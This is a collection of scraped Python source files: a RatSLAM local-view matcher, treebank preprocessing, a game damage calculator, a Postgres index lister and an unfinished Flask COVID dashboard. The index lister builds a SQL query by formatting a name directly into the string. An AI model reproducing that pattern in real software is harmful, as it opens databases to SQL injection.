+ 3.0)/6.0 ))\n\n # find the current mean\n self.current_mean = np.mean(self.current_view)\n\n return self.current_view\n\n\n def __set_current_vt__(self, current_vt):\n '''\n Purpose: This routine updates the current visual template (current-vt).\n\n Algorithm: Verifies if the current-vt is different from the input, if\n it is, updates the prev-vt and current-vt values, if it is not, just\n updates the current-vt.\n\n Inputs:\n current-vt: id of the current visual template\n\n Outputs: -\n '''\n if self.current_vt != current_vt:\n self.prev_vt = self.current_vt\n self.current_vt = current_vt\n\n def __create_template__(self):\n '''\n Purpose: This routine creates a new VisualTemplate ( Localview cell )\n and add this to the collection.\n\n Algorithm: Create a new VisualTemplate object that stores the current\n frame and the current mean of this frame. Then, this new VisualTemplate\n is added to the collection.\n\n Inputs: -\n\n Outputs: Id of the VisualTemplate created\n '''\n newcell = VisualTemplate( self.templates.size, # template id\n self.current_view,\n self.current_mean )\n\n # Add newcell to the collection\n self.templates = np.append(self.templates, newcell)\n\n return self.templates.size -1\n\n # @cuda.jit('float32,int32(float32, int32)')\n def __compare__(self, vt_err, vt_match_id):\n '''\n Purpose: This routine compares a visual template to all the stored\n templates, returning the closest template and the error between these two.\n\n\n Algorithm: For each visual template, tries matching the view at different\n offsets. After finding the smallest offset, calculates the error between\n these two visual templates, the matching id and the relative angle between\n them.\n\n Inputs:\n vt-err: variable that will store the error between two closest\n visual templates\n\n vt-match-id: variable that will store the closest template id\n\n Outputs: the error between the two matching visual templates and the\n id of the closest template\n '''\n if self.templates.size == 0:\n vt_err = DBL_MAX\n self.vt_error = vt_err\n return vt_err, vt_match_id\n\n mindiff = DBL_MAX # stores the smaller difference\n vt_err = DBL_MAX # stores the smaller error\n min_template = 0 # stores the id of the closest template\n epsilon = 0 #0.005\n min_offset = 0 # stores the relative facing direction angle between the closest templates\n\n # for each vt try matching the view at different offsets\n # handles 2d images shifting only in the x direction\n if VT_PANORAMIC:\n for vt in self.templates:\n if( abs( self.current_mean - vt.mean ) > VT_MATCH_THRESHOLD + epsilon ):\n continue\n for offset in range( 0, TEMPLATE_X_SIZE, VT_STEP_MATCH ):\n cdiff = 0\n columnAux = 0\n while columnAux < TEMPLATE_SIZE - offset:\n cdiff += np.sum( np.abs( self.current_view[ columnAux: columnAux + TEMPLATE_X_SIZE - offset]\n - vt.data[ columnAux + offset : columnAux + TEMPLATE_X_SIZE ] ) )\n cdiff += np.sum( np.abs( self.current_view[ columnAux + TEMPLATE_X_SIZE - offset : columnAux + TEMPLATE_X_SIZE ]\n - vt.data[ columnAux:columnAux + offset ] ) )\n columnAux += TEMPLATE_X_SIZE\n if cdiff < mindiff:\n mindiff = cdiff\n min_template = vt.id\n min_offset = offset\n\n # Matheus: get vt_relative_rad by min_offset value\n self.vt_relative_rad = min_offset / TEMPLATE_X_SIZE * 2.0 * np.pi\n\n if self.vt_relative_rad > np.pi:\n self.vt_relative_rad = self.vt_relative_rad - 2.0 * np.pi\n\n vt_err = mindiff/ TEMPLATE_SIZE\n vt_match_id = min_template\n self.vt_error = vt_err\n else:\n for vt in self.templates:\n if( abs( self.current_mean - vt.mean ) > VT_MATCH_THRESHOLD + epsilon ):\n continue\n # VT_SHIFT_MATCH is the range (in pixel units) of horizontal offsets over which the current\n # image is compared to all learnt image templates\n for offset in range( 0, VT_SHIFT_MATCH * 2 - 1, VT_STEP_MATCH ):\n cdiff = 0\n columnAux = 0\n while columnAux < TEMPLATE_SIZE - 2 * VT_SHIFT_MATCH:\n cdiff += np.sum( np.abs( self.current_view[ columnAux + VT_SHIFT_MATCH : columnAux + TEMPLATE_X_SIZE - VT_SHIFT_MATCH ]\n - vt.data[ columnAux + offset : columnAux + TEMPLATE_X_SIZE - 2 * VT_SHIFT_MATCH + offset ] ) )\n columnAux += TEMPLATE_X_SIZE\n if cdiff < mindiff:\n mindiff = cdiff\n min_template = vt.id\n min_offset = 0\n\n self.vt_relative_rad = min_offset / TEMPLATE_X_SIZE * 2.0 * np.pi\n vt_err = mindiff / ( TEMPLATE_SIZE - 2 * VT_SHIFT_MATCH * TEMPLATE_Y_SIZE )\n vt_match_id = min_template\n self.vt_error = vt_err\n\n return vt_err, vt_match_id\n\n \n\n def save(self, prefix):\n '''\n Purpose: This routine saves all the visual templates stored in the collection.\n\n Algorithm: Create a file and store first the id, then the mean and the\n data of visual template.\n\n Inputs: -\n\n Outputs: -\n '''\n with open( str(prefix) +'/localviewcells.txt', 'w') as file:\n file.writelines(str(TEMPLATE_Y_SIZE*TEMPLATE_X_SIZE)+'\\n')\n for i in range(self.templates.size):\n vt = self.templates[i]\n file.writelines(str(vt.id) + '\\n')\n file.writelines(str(vt.mean) + '\\n')\n np.savetxt(file, vt.data, newline=\" \")\n file.writelines('\\n')\n file.writelines(\"-\\n\")\n file.writelines(str(self.current_vt) + '\\n')\n file.writelines(str(self.prev_vt) + '\\n')\n\n def load(self, prefix):\n '''\n Purpose: This routine loads all the visual templates saved and add them\n to the collection.\n\n Algorithm: Open a file with all the visual template stored and for each\n visual template, create a new VisualTemplate object and store it in the\n collection.\n\n Inputs: -\n\n Outputs: -\n '''\n \n with open( str(prefix) +'/localviewcells.txt', 'r') as file:\n tam = int(file.readline())\n line = file.readline()\n while line != \"-\\n\":\n id = float(line)\n line = file.readline()\n mean = float(line)\n line = file.readline()\n datastr = np.array(line.split(\" \"))\n data = np.array([])\n for it in datastr:\n if it != '\\n':\n it = float(it)\n data = np.append(data, np.array(it))\n line = file.readline()\n self.current_view = data\n self.current_mean = mean\n self.__create_template__()\n line = file.readline()\n self.current_vt = float(line)\n line = file.readline()\n self.prev_vt = float(line)\n \n #MAURO -> FUNCAO DE MERGE DOS TEMPLATES\n \n def merge(self, templates, vt_size):\n \n for vt in templates:\n \n # print 'id do novo template: ' + str(vt.id + vt_size)\n\n newcell = VisualTemplate(vt.id + vt_size, # template id\n vt.data,\n vt.mean )\n\n # Add newcell to the collection\n self.templates = np.append(self.templates, newcell)\n\n \n def __call__(self, img, grayscale):\n self.on_image( img, grayscale )\n return self.current_vt, self.vt_relative_rad\n\n","sub_path":"ratslam/local_view_match.py","file_name":"local_view_match.py","file_ext":"py","file_size_in_byte":20634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"37558185","text":"import nltk\nfrom nltk.tree import Tree\nfrom functools import reduce\nfrom nltk import tree, treetransforms\nfrom copy import deepcopy\nfrom collections import deque\nimport queue\nimport argparse\nimport pickle\nimport os\nfrom datetime import datetime\n# from utils import build_vocab,precess_arc\nDATA_DIR='../Data/Treebank/pred_spmrl'\nLanguages=['Basque','French','German','Hebrew','Hungarian','Korean','Polish','swedish']\n#Germany have many very long labels\n#Hebrew and Swedish do not have train, only train5k\n#Hebrew have morphology in word label and phrase label\n\n\n# def finding_right_most_sibling(tree, binary_format=True):\n# \tif not binary_format:\n# \t\tprint(\"so far we only have for the binary format\")\n# \tassert binary_format == True\n# \tindex_list = []\n# \tfor i in range(len(tree.leaves())):\n# \t\tleaf_pos = tree.leaf_treeposition(i)\n# \t\tnon_zero_list = [j for j in range(len(leaf_pos)) if leaf_pos[j] != 0]\n# \t\tif len(non_zero_list) == 0:\n# \t\t\tindex_list.append([[i, len(tree.leaves()) - 1], tree[0].label()])\n# \t\telif non_zero_list[-1] == len(leaf_pos) - 2:\n# \t\t\tzero_list = [k for k in range(len(leaf_pos)) if leaf_pos[k] == 0]\n# \t\t\tsubtree = tree[leaf_pos[:zero_list[-2] + 1]]\n# \t\t\tif '|' in subtree.label():\n# \t\t\t\tindex_list.append([[i, i], 'DUMMY_NODE_LABEL'])\n# \t\t\telse:\n# \t\t\t\tindex_list.append([[i, i], subtree.label()])\n#\n# \t\telse:\n# \t\t\tsubtree = tree[leaf_pos[:non_zero_list[-1] + 1]]\n# \t\t\tif '|' in subtree.label():\n# \t\t\t\tindex_list.append([[i, i + len(subtree.leaves()) - 1], 'DUMMY_NODE_LABEL'])\n# \t\t\telse:\n# \t\t\t\tindex_list.append([[i, i + len(subtree.leaves()) - 1], subtree.label()])\n# \t# subtree.pretty_print()\n# \treturn index_list\n\n\ndef finding_biggest_phrase_sibling(tree, binary_format=True):\n\tif not binary_format:\n\t\tprint(\"so far we only have for the binary format\")\n\tassert binary_format == True\n\tindex_list = []\n\tfor i in range(len(tree.leaves())):\n\t\tleaf_pos = tree.leaf_treeposition(i)\n\t\tnon_zero_list = [j for j in range(len(leaf_pos)) if leaf_pos[j] != 0]\n\t\t# last_child_list=[len(tree[leaf_pos[:j]])-1 for j in range(len(leaf_pos))]\n\t\t# non_last_child_list=[j for j in range(len(leaf_pos)) if leaf_pos[j] != last_child_list[j]]\n\t\tif len(non_zero_list) == 0:\n\t\t\tindex_list.append([[i, len(tree.leaves()) - 1], precess_arc(tree[0].label())])\n\t\telse:\n\t\t\tsubtree_pos = leaf_pos[:non_zero_list[-1] + 1]\n\t\t\tsubtree = tree[subtree_pos]\n\t\t\tif len(subtree) > 1:\n\t\t\t\tif '|' in subtree.label():\n\t\t\t\t\tindex_list.append([[i, i + len(subtree.leaves()) - 1], 'DUMMY_NODE_LABEL'])\n\t\t\t\telse:\n\t\t\t\t\tindex_list.append([[i, i + len(subtree.leaves()) - 1], precess_arc(subtree.label())])\n\t\t\telse:\n\t\t\t\tlast_child_subtree_list = [len(tree[subtree_pos[:j]]) - 1 for j in range(len(subtree_pos))]\n\t\t\t\tnon_last_child_subtree = [j for j in range(len(subtree_pos)) if\n\t\t\t\t subtree_pos[j] != last_child_subtree_list[j]]\n\t\t\t\tif len(non_last_child_subtree) == 0:\n\t\t\t\t\tindex_list.append([[i, 0], precess_arc(tree[0].label())])\n\t\t\t\telse:\n\t\t\t\t\tsubtree = tree[subtree_pos[:non_last_child_subtree[-1] + 1]]\n\t\t\t\t\tif '|' in subtree.label():\n\t\t\t\t\t\tindex_list.append([[i, i - len(subtree.leaves()) + 1], 'DUMMY_NODE_LABEL'])\n\t\t\t\t\telse:\n\t\t\t\t\t\tindex_list.append([[i, i - len(subtree.leaves()) + 1], precess_arc(subtree.label())])\n\t# subtree.pretty_print()\n\treturn index_list\n\ndef finding_special_splitting_point(tree, binary_format=True, padding_item=-1):\n\tindex_list = finding_biggest_phrase_sibling(tree, binary_format)\n\tspecial_list = [padding_item] * len(index_list)\n\tfor i in range(len(index_list) - 1):\n\t\tif index_list[i][0][1] == index_list[i+1][0][1]:\n\t\t\tspecial_list[i] = i\n\t\telif index_list[index_list[i+1][0][1]][0][1] == i:\n\t\t\tspecial_list[i] = i\n\t\telif index_list[index_list[i][0][1]][0][1] == i+1:\n\t\t\tspecial_list[i] = i\n\t\telse:\n\t\t\tspecial_list[i] = padding_item\n\treturn special_list\n\nclass timeit():\n\n\tdef __enter__(self):\n\t\tself.tic = self.datetime.now()\n\n\tdef __exit__(self, *args, **kwargs):\n\t\tprint('runtime: {}'.format(self.datetime.now() - self.tic))\n\ndef prepare_data(language):\n\t# assert map_method in ['right_most', 'biggest_phrase'],'We do not support that map method here'\n\tassert language in Languages,\"We do not support ['Basque','French','German','Hebrew','Hungarian','Korean','Polish','swedish'] here\"\n\tlanguage_path=os.path.join(DATA_DIR,language)\n\tif not os.path.exists(os.path.join(language_path,'predtrain')):\n\t\ttrain_path=os.path.join(language_path,'predtrain5k')\n\telse:\n\t\ttrain_path = os.path.join(language_path, 'predtrain')\n\tdev_path=os.path.join(language_path, 'preddev')\n\ttest_path=os.path.join(language_path, 'predtest')\n\tprint(train_path)\n\tprint(dev_path)\n\tprint(test_path)\n\tprint(\"Convert data to binary tree\")\n\tprint(\"Here we use chomsky normal by splitting on right\")\n\twith open(train_path) as f:\n\t\ttrain_raw=f.readlines()\n\t\ttrain_raw=[x.strip() for x in train_raw]\n\twith open(dev_path) as f:\n\t\tdev_raw=f.readlines()\n\t\tdev_raw=[x.strip() for x in dev_raw]\n\twith open(test_path) as f:\n\t\ttest_raw=f.readlines()\n\t\ttest_raw=[x.strip() for x in test_raw]\n\tcheck=datetime.now()\n\ttrain_data = []\n\tfor i in range(len(train_raw)):\n\t\tsent = train_raw[i]\n\t\tsent_tree = nltk.Tree.fromstring(sent)\n\t\tsent_tree.collapse_unary(sent_tree, joinChar=\"====\")\n\t\tsent_tree.chomsky_normal_form()\n\t\tsent_pos = [sent_tree[sent_tree.leaf_treeposition(j)[:-1]] for j in range(len(sent_tree.leaves()))]\n\t\tsent_pos = [' '.join(str(x).split()) for x in sent_pos]\n\t\tsent_word_label = ['DUMMY_WORD_LABEL'] * len(sent_tree.leaves())\n\t\tfor j in range(len(sent_tree.leaves())):\n\t\t\tif len(sent_tree.leaf_treeposition(j)) > 2:\n\t\t\t\tif len(sent_tree[sent_tree.leaf_treeposition(j)[:-2]]) == 1:\n\t\t\t\t\tsent_word_label[j] = sent_tree[sent_tree.leaf_treeposition(j)[:-2]].label()\n\t\t# sent_tree.pretty_print()\n\t\tsent_output = finding_biggest_phrase_sibling(sent_tree)\n\t\tsent_special_point = finding_special_splitting_point(sent_tree)\n\t\tsent_word_label = [precess_arc(x) for x in sent_word_label]\n\t\ttrain_data.append([sent_pos, sent_output, sent_word_label, sent_special_point])\n\tdev_data = []\n\tfor i in range(len(dev_raw)):\n\t\tsent = dev_raw[i]\n\t\tsent_tree = nltk.Tree.fromstring(sent)\n\t\tsent_tree.collapse_unary(sent_tree, joinChar=\"====\")\n\t\tsent_tree.chomsky_normal_form()\n\t\tsent_pos = [sent_tree[sent_tree.leaf_treeposition(j)[:-1]] for j in range(len(sent_tree.leaves()))]\n\t\tsent_pos = [' '.join(str(x).split()) for x in sent_pos]\n\t\tsent_word_label = ['DUMMY_WORD_LABEL'] * len(sent_tree.leaves())\n\t\tfor j in range(len(sent_tree.leaves())):\n\t\t\tif len(sent_tree.leaf_treeposition(j)) > 2:\n\t\t\t\tif len(sent_tree[sent_tree.leaf_treeposition(j)[:-2]]) == 1:\n\t\t\t\t\tsent_word_label[j] = sent_tree[sent_tree.leaf_treeposition(j)[:-2]].label()\n\t\t# sent_tree.pretty_print()\n\t\tsent_output = finding_biggest_phrase_sibling(sent_tree)\n\t\tsent_special_point = finding_special_splitting_point(sent_tree)\n\t\tsent_word_label = [precess_arc(x) for x in sent_word_label]\n\t\tdev_data.append([sent_pos, sent_output, sent_word_label, sent_special_point])\n\ttest_data = []\n\tfor i in range(len(test_raw)):\n\t\tsent = test_raw[i]\n\t\tsent_tree = nltk.Tree.fromstring(sent)\n\t\tsent_tree.collapse_unary(sent_tree, joinChar=\"====\")\n\t\tsent_tree.chomsky_normal_form()\n\t\tsent_pos = [sent_tree[sent_tree.leaf_treeposition(j)[:-1]] for j in range(len(sent_tree.leaves()))]\n\t\tsent_pos = [' '.join(str(x).split()) for x in sent_pos]\n\t\tsent_word_label = ['DUMMY_WORD_LABEL'] * len(sent_tree.leaves())\n\t\tfor j in range(len(sent_tree.leaves())):\n\t\t\tif len(sent_tree.leaf_treeposition(j)) > 2:\n\t\t\t\tif len(sent_tree[sent_tree.leaf_treeposition(j)[:-2]]) == 1:\n\t\t\t\t\tsent_word_label[j] = sent_tree[sent_tree.leaf_treeposition(j)[:-2]].label()\n\t\t# sent_tree.pretty_print()\n\t\tsent_output = finding_biggest_phrase_sibling(sent_tree)\n\t\tsent_special_point = finding_special_splitting_point(sent_tree)\n\t\tsent_word_label=[precess_arc(x) for x in sent_word_label]\n\t\ttest_data.append([sent_pos, sent_output, sent_word_label, sent_special_point])\n\tprint(datetime.now() - check)\n\treturn train_data, dev_data, test_data\n\ndef precess_arc(label):\n\tlabels = label.split('====')\n\tnew_arc = []\n\tfor l in labels:\n\t\tif l == 'ADVP':\n\t\t\tl = 'PRT'\n\t\t# if len(new_arc) > 0 and l == new_arc[-1]:\n\t\t# continue\n\t\tnew_arc.append(l)\n\tlabel = '===='.join(new_arc)\n\treturn label\n\n#%%\n\n\n#%% md\n\n\n#%%\ndef convert_data(data_raw, vocab_dict):\n\tindices_data = {'sents': [], 'tags': [], 'pointing': [], 'labels': [], 'word_labels': [],'special_splitting':[],'sent_char':[],'tag_char':[]}\n\ttag_vocabulary=vocab_dict['tag_vocab']\n\tword_vocabulary = vocab_dict['word_vocab']\n\tlabel_vocabulary = vocab_dict['phrase_label_vocab']\n\tword_label_vocabulary = vocab_dict['word_label_vocab']\n\tchar_word_vocabulary = vocab_dict['char_word_vocab']\n\tchar_tag_vocabulary=vocab_dict['char_tag_vocab']\n\tfor x in data_raw:\n\t\ttags_words = x[0]\n\t\ttags = []\n\t\twords = []\n\t\tchar_sent = []\n\t\tchar_tags = []\n\t\tfor string in tags_words:\n\t\t\ttag, word = string.replace('(', '').replace(')', '').split(' ')\n\t\t\t# if not (word in ['','']):\n\t\t\t# \tchar_word = [char.lower() for char in word]\n\t\t\t# \tchar_word.insert(0,\"\")\n\t\t\t# else:\n\t\t\t# \tchar_word=[word]\n\t\t\t# \tchar_word.insert(0, \"\")\n\t\t\t# if not (tag in ['','','DUMMY_NODE_LABEL','DUMMY_WORD_LABEL']):\n\t\t\t# \tchar_tag = [char.lower() for char in tag]\n\t\t\t# \tchar_tag.insert(0, \"\")\n\t\t\t# \tchar_tag.append(\"\")\n\t\t\t# else:\n\t\t\t# \tchar_tag=[tag]\n\t\t\t# \tchar_tag.insert(0, \"\")\n\t\t\t# \tchar_tag.append(\"\")\n\t\t\ttags.append(tag)\n\t\t\twords.append(word)\n\t\t\t# char_sent.append(char_word)\n\t\t\t# char_tags.append(char_tag)\n\t\t# t = tag_vocabulary.convert2idx(tags)\n\t\t# s = word_vocabulary.convert2idx(words)\n\t\t# t_char = [char_tag_vocabulary.convert2idx(tags_split) for tags_split in char_tags]\n\t\t# s_char = [char_word_vocabulary.convert2idx(words_split) for words_split in char_sent]\n\t\tindices_data['sents'].append(words)\n\t\tindices_data['tags'].append(tags)\n\t\tphrases_labels = x[1]\n\t\tindices_data['pointing'].append([string[0][1] for string in phrases_labels])\n\t\tindices_data['labels'].append(label_vocabulary.convert2idx([string[1] for string in phrases_labels]))\n\t\tword_labels = x[2]\n\t\t# indices_data['sent_char'].append(s_char)\n\t\t# indices_data['tag_char'].append(t_char)\n\t\tindices_data['word_labels'].append(word_label_vocabulary.convert2idx([string for string in word_labels]))\n\t\tindices_data['special_splitting'].append(x[3])\n\tassert (len(indices_data['pointing']) == len(indices_data['labels'])) and (\n\t\t\tlen(indices_data['pointing']) == len(indices_data['sents'])) and (\n\t\t\tlen(indices_data['pointing']) == len(indices_data['tags'])) and (\n\t\t\tlen(indices_data['pointing']) == len(indices_data['special_splitting']))\n\treturn indices_data\n# transform_train=convert_data(train_data)\n# transform_dev=convert_data(dev_data)\n# transform_test=convert_data(test_data)\n#\n# #%%\n#\n# print([transform_test[key][0] for key in transform_test])\n# print(word_vocabulary.convert2word(transform_test['sents'][0]))\n# print(tag_vocabulary.convert2word(transform_test['tags'][0]))\n# print(label_vocabulary.convert2word(transform_test['labels'][0]))\n# print(word_label_vocabulary.convert2word(transform_test['word_labels'][0]))\n\n\n","sub_path":"preprocess_data_spmrl_transformer_predpos.py","file_name":"preprocess_data_spmrl_transformer_predpos.py","file_ext":"py","file_size_in_byte":11179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"389881827","text":"LIMIT_BREAK_LEVEL = 110\n\nINFO_STRING = \"\"\"[{}] {}\n(Co-op mode)\n\nWithout Latents:\nBase: {}\nSubattr: {}\nTotal: {}\n\nWith Latents:\nBase: {}\nSubattr: {}\nTotal: {}\n\"\"\"\n\n\nclass ButtonInfo:\n def get_info(self, dgcog, monster_model):\n\n \"\"\"\n Usage: ^buttoninfo Vajrayasaka\n\n Shows (main, sub, main+sub)damage x (with | without) atk++ latents\n\n Optional arguments include:\n\n [coop|solo], default coop\n e.g:\n\n button dmg: 7668\n with subattr: 9968.4\n just subattr: whatever\n\n button dmg with atklatent: 8454.51\n with subattr: 10990.863\n just subattr: whatever\n \"\"\"\n max_level = LIMIT_BREAK_LEVEL if monster_model.limit_mult != 0 else monster_model.level\n max_atk_latents = monster_model.latent_slots / 2\n\n sub_attr_multiplier = self._get_sub_attr_multiplier(monster_model)\n\n result = ButtonInfoResult()\n result.main_damage = self._calculate_damage(dgcog, monster_model, max_level, 0)\n result.sub_damage = result.main_damage * sub_attr_multiplier\n result.total_damage = result.main_damage + result.sub_damage\n\n result.main_damage_with_atk_latent = self._calculate_damage(dgcog, monster_model, max_level, max_atk_latents)\n result.sub_damage_with_atk_latent = result.main_damage_with_atk_latent * sub_attr_multiplier\n result.total_damage_with_atk_latent = result.main_damage_with_atk_latent + result.sub_damage_with_atk_latent\n return result\n\n def _calculate_damage(self, dgcog, monster_model, level, num_atkpp_latent=0):\n stat_latents = dgcog.MonsterStatModifierInput(num_atkpp=num_atkpp_latent)\n stat_latents.num_atk_awakening = len([x for x in monster_model.awakenings if x.awoken_skill_id == 1])\n\n dmg = dgcog.monster_stats.stat(monster_model, 'atk', level, stat_latents=stat_latents)\n num_mult_boost = len([x for x in monster_model.awakenings if x.awoken_skill_id == 30])\n\n dmg *= 1.5 ** num_mult_boost\n return dmg\n\n def _get_sub_attr_multiplier(self, monster_model):\n if monster_model.attr2.value == 6 or monster_model.attr1.value == 6:\n return 0\n if monster_model.attr2.value == monster_model.attr1.value:\n return 1 / 10\n return 1 / 3\n\n def to_string(self, monster, info):\n return INFO_STRING.format(monster.monster_id, monster.name_en, info.main_damage, info.sub_damage,\n info.total_damage,\n info.main_damage_with_atk_latent, info.sub_damage_with_atk_latent,\n info.total_damage_with_atk_latent)\n\n\nclass ButtonInfoResult:\n main_damage: float\n total_damage: float\n sub_damage: float\n main_damage_with_atk_latent: float\n total_damage_with_atk_latent: float\n sub_damage_with_atk_latent: float\n\n\nbutton_info = ButtonInfo()\n","sub_path":"padinfo/button_info.py","file_name":"button_info.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"181819067","text":"from itertools import groupby\n\nfrom werkzeug.exceptions import NotFound\n\nfrom schema_watcher.utils.data_getters import EntityDataStrategy\nfrom schema_watcher.utils.data_types import DataTypes\n\n\nclass IndexesDataStrategy(EntityDataStrategy):\n __names_type__ = DataTypes.indexes_names\n __object_type__ = DataTypes.index\n\n _query = '''\n SELECT ix.relname, a.attname, i.indisunique\nFROM pg_index i\nJOIN pg_attribute a ON a.attrelid = i.indrelid\n AND a.attnum = ANY(i.indkey)\nJOIN pg_class ix ON ix.oid = i.indexrelid\nJOIN pg_namespace n ON n.oid = ix.relnamespace and n.nspname = 'public'\n '''\n\n def _load_names(self, **kwargs):\n return [row[0] for row in self._getter.engine.execute('''\n SELECT ix.relname\nFROM pg_index i\nJOIN pg_class ix ON ix.oid = i.indexrelid\nJOIN pg_namespace n ON n.oid = ix.relnamespace and n.nspname = 'public'\n ''')]\n\n def _load_entity(self, entity_name, **kwargs):\n result = self._getter.engine.execute(self._query + 'and ix.relname=\\'{0}\\''.format(entity_name)).fetchall()\n if result:\n resp = {'name': result[0][0], 'columns': [], 'is_unique': result[0][2]}\n for row in result:\n resp['columns'].append(row[1])\n return resp\n else:\n raise NotFound('index %s not found')\n\n def _load_entities(self, **kwargs):\n result = []\n for index_key, index_cols in groupby(self._getter.engine.execute(self._query + ' order by ix.relname'),\n key=lambda row: (row[0], row[2])):\n index_name, index_is_unique = index_key\n ind_result = {'name': index_name, 'columns': [], 'is_unique': index_is_unique}\n for ind_col in index_cols:\n ind_result['columns'].append(ind_col[1])\n result.append(ind_result)\n return result\n","sub_path":"schema_watcher/utils/data_getters/indexes.py","file_name":"indexes.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"380136147","text":"#!/usr/bin/env python\nimport os\nfrom flask import Flask, session, render_template\nfrom flask import request\nimport requests\nimport json\nimport subprocess\nfrom termcolor import colored\n\nfrom punisher import publish\n\napplication = Flask(__name__)\napplication.secret_key = os.urandom(25)\n\n#data={}\n#innerHTML = \"\"\ndict_innerHTML = {}\ndict_state = {}\n\ndropdown = \"\"\noptionlist = \"\"\n \nformatteddropdown = \"\"\n\n\n@application.route('/rawpost', methods=['POST'])\ndef covidDataUpdate():\n print(colored('inside covidDataUpdate', 'green', 'on_red'))\n print(type(request))\n print(type(request.form))\n print(type(request.form['raw']))\n print(request.form['raw'])\n raw=request.form['raw']\n session_data = session.get('data')\n print(\"----------------from rawpost-session_data------------------\")\n print(session_data)\n if bool(raw) :\n \n print(colored(request, 'red', 'on_white')) # should display 'bar'\n\n print(\"raw post....\")\n #response = requests.get(\"https://api.covid19india.org/data.json\")\n print(\"Hello world!\")\n #print(response.json())\n #data = raw\n #data = json.loads(raw)\n #print(\"type of data\",type(data))\n #session['data'] = raw\n session['rawpost'] = {'statewise':raw[\"statewise\"]}\n session['data'] = {'statewise':raw[\"statewise\"]}\n print(raw)\n \n return json.dumps({'errors': \"errors\"})\n\n@application.route('/raw', methods=['GET'])\ndef getcovidDataUpdate():\n print(colored('inside get>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>','green', 'on_grey'))\n print(type(request))\n print(type(request.args.get('raw')))\n #print(type(request.form[0]))\n print(request.args.get('raw'))\n print(json.dumps(request.args.get('raw')))\n raw=json.dumps(request.args.get('raw'))\n print(colored(raw, 'red', 'on_white')) # should display 'bar'\n\n print(\"hello called....\")\n #response = requests.get(\"https://api.covid19india.org/data.json\")\n print(\"Hello world!\")\n #print(response.json())\n data = raw\n\n cords = data[\"statewise\"]\n print(cords)\n print(cords[0][\"state\"])\n\n for covid in data['statewise']:\n covidkeys = covid.keys()\n innerHTML=\"\"\n for key in covidkeys:\n innerHTMLobj = \"{labels:}: {values:}\"\n formattedinnerHTMLobj = innerHTMLobj.format(labels=key, values=covid[key])\n #print(formattedinnerHTMLobj)\n innerHTML += formattedinnerHTMLobj\n #print(innerHTML)\n dict_innerHTML[covid['statecode']] = innerHTML\n dict_state[covid['statecode']] = covid[\"state\"]\n #print(innerHTML)\n global optionlist\n for keys in dict_state:\n print(dict_state[keys])\n optionlistobj=\"\"\n formattedoptionlistobj = optionlistobj.format(key=keys, value=dict_state[keys])\n optionlist += formattedoptionlistobj\n \n formatteddropdown = dropdown.format(options=optionlist)\n print(colored('==========================new[]record===========================', 'green', 'on_red'))\n print(raw)\n \n return json.dumps({'errors': \"errors\"})\n\n\n\ndata={}\nsession_data={}\n@application.route('/state', methods=['GET'])\ndef covidstate():\n print(\"Inside covidstate-------\")\n print(\"----------------------------------------\")\n print(session.get('rawpost'))\n print(\"----------------------------------------\")\n print(session.get('data'))\n print(\"----------------------------------------\")\n obj = session.get('rawpost')\n if bool(obj) :\n print(\"----------------rawpost----------------\")\n print(session.get('rawpost'))\n session_data = session.get('rawpost')\n print(\"--------session_data_loaded_from_session------------------\")\n print(session_data)\n data = session_data['statewise']\n print(json.dumps(data))\n else :\n print(\"----------------data----------------\")\n print(session.get('data'))\n session_data = session.get('data')\n #cords = data\n #print(data[0][\"state\"])\n dict_statewise={}\n if bool(session_data) :\n print(\"------------------session_data--------------------\")\n print(session_data)\n for covid in session_data['statewise']:\n covidkeys = covid.keys()\n innerHTML=\"\"\n for key in covidkeys:\n innerHTMLobj = \"{labels:}: {values:}\"\n formattedinnerHTMLobj = innerHTMLobj.format(labels=key, values=covid[key])\n #print(formattedinnerHTMLobj)\n innerHTML += formattedinnerHTMLobj\n #print(innerHTML)\n #dict_innerHTML[covid[\"statecode\"]] = innerHTML\n dict_statewise[covid['statecode']] = covid\n print(\"-----------------------from dict_statewise--------------------------\")\n print(covid['statecode'])\n print(covid)\n print(dict_statewise[covid['statecode']])\n print(\"--------------------------------------------------------------------\")\n #dict_state[covid[\"statecode\"]] = covid[\"state\"]\n #print(innerHTML)\n\n #print(innerHTML)\n stateOption=request.args.get('stateOption')\n statecode = stateOption\n print(statecode)\n \n return render_template('statewise.html', heading=\"statewise\", state=dict_statewise[statecode])\n\n\n #return formattedhtml_snippet\n\n\n\n@application.route('/')\ndef covid():\n print(\"hello called....\")\n response = requests.get(\"https://api.covid19india.org/data.json\")\n print(\"Hello world!\")\n #print(response.json())\n data = response.json()\n session['data'] = {'statewise':data[\"statewise\"]}\n cords = data[\"statewise\"]\n #print(cords)\n print(cords[0][\"state\"])\n covids={}\n dict_statewise={}\n for covid in data['statewise']:\n covids = covid\n covidkeys = covid.keys()\n innerHTML=\"\"\n dict_innerHTML[covid[\"statecode\"]] = innerHTML\n dict_statewise[covid[\"statecode\"]] = covid\n dict_state[covid[\"statecode\"]] = covid[\"state\"]\n #print(innerHTML)\n global optionlist\n for keys in dict_state:\n #print(dict_state[keys])\n optionlistobj=\"\"\n formattedoptionlistobj = optionlistobj.format(key=keys, value=dict_state[keys])\n optionlist += formattedoptionlistobj\n \n formatteddropdown = dropdown.format(options=optionlist)\n\n #html_snippet = \"HTML in 10 Simple Steps or Less\"\n #html_snippet = \"\"\n html_snippet=\"covid results {heading:}
    {select:}
    Select state
    {innerHTMLS:}
    \"\n\n formattedhtml_snippet = html_snippet.format(heading=\"statewise\", select=formatteddropdown ,innerHTMLS=dict_innerHTML[\"TT\"])\n\n #print(html_snippet)\n\n #html_snippet=\"\"+innerHTML+\"
    covid results
